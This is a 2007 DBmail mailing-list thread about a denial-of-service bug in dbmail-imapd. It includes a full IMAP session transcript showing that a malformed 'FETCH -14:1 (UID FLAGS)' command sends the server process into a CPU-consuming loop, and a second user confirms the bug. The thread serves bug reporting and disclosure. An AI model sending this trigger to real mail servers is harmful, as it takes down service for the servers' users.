We're ignored... And waiting for mass DoS :(
21.11.07, 14:51, Marc Dirix ([EMAIL PROTECTED]): > I can confirm this problem, with using these same steps, dbmail > 2.1.7-svn. > On Wed, Nov 21, 2007 at 02:12:19PM +0300, umask wrote: > > wake up :) > > > > this bug is big security hole provides DoS and 100% CPU utilization. > > > > Please fix ASAP. > > > > > > 21.11.07, 08:18, umask ([EMAIL PROTECTED]): > > > > > It's big bug :( > > > Steps to reproduce. > > > telnet imap.server.net 143 > > > Trying 192.168.1.1... > > > Connected to imap.server.net. > > > Escape character is '^]'. > > > * OK IMAP4 ready > > > a001 login [EMAIL PROTECTED] password > > > a001 OK LOGIN completed > > > a002 noop > > > a002 OK NOOP completed > > > a003 SELECT INBOX > > > * 1 EXISTS > > > * 0 RECENT > > > * FLAGS (\Seen \Answered \Deleted \Flagged \Draft) > > > * OK [PERMANENTFLAGS (\Seen \Answered \Deleted \Flagged \Draft)] > > > * OK [UIDNEXT 791936] Predicted next UID > > > * OK [UIDVALIDITY 72365] UID value > > > a003 OK [READ-WRITE] SELECT completed > > > a004 SEARCH UID 1:279261 > > > * SEARCH 1 > > > a004 OK SEARCH completed > > > a005 FETCH -14:1 (UID FLAGS) > > > And dbmail-imapd proccess which handle IMAP connections enter in loop. > > > 20.11.07, 18:39, Marc Dirix ([EMAIL PROTECTED]): > > > > I don't think the top or ps outputs are that helpfull, > > > > can you provide: > > > > 1) mailbox size, message nummer etc for the mailbox that triggers te > > > > problem > > > > 2) Message, if you can determine which message triggers the problem. > > > > 3) Client, is it mailclient related? > > > > And maybe a Level5 log, so dev's can parse it. > > > > (please remove passwords, and sensitive data). > > > > Marc > > > > _______________________________________________ > > > > DBmail mailing list > > > > [email protected] > > > > https://mailman.fastxs.nl/mailman/listinfo/dbmail > > > _______________________________________________ > > > DBmail mailing list > > > [email protected] > > > https://mailman.fastxs.nl/mailman/listinfo/dbmail > > _______________________________________________ > > DBmail mailing list > > [email protected] > > https://mailman.fastxs.nl/mailman/listinfo/dbmail > _______________________________________________ > DBmail mailing list > [email protected] > https://mailman.fastxs.nl/mailman/listinfo/dbmail _______________________________________________ DBmail mailing list [email protected] https://mailman.fastxs.nl/mailman/listinfo/dbmail
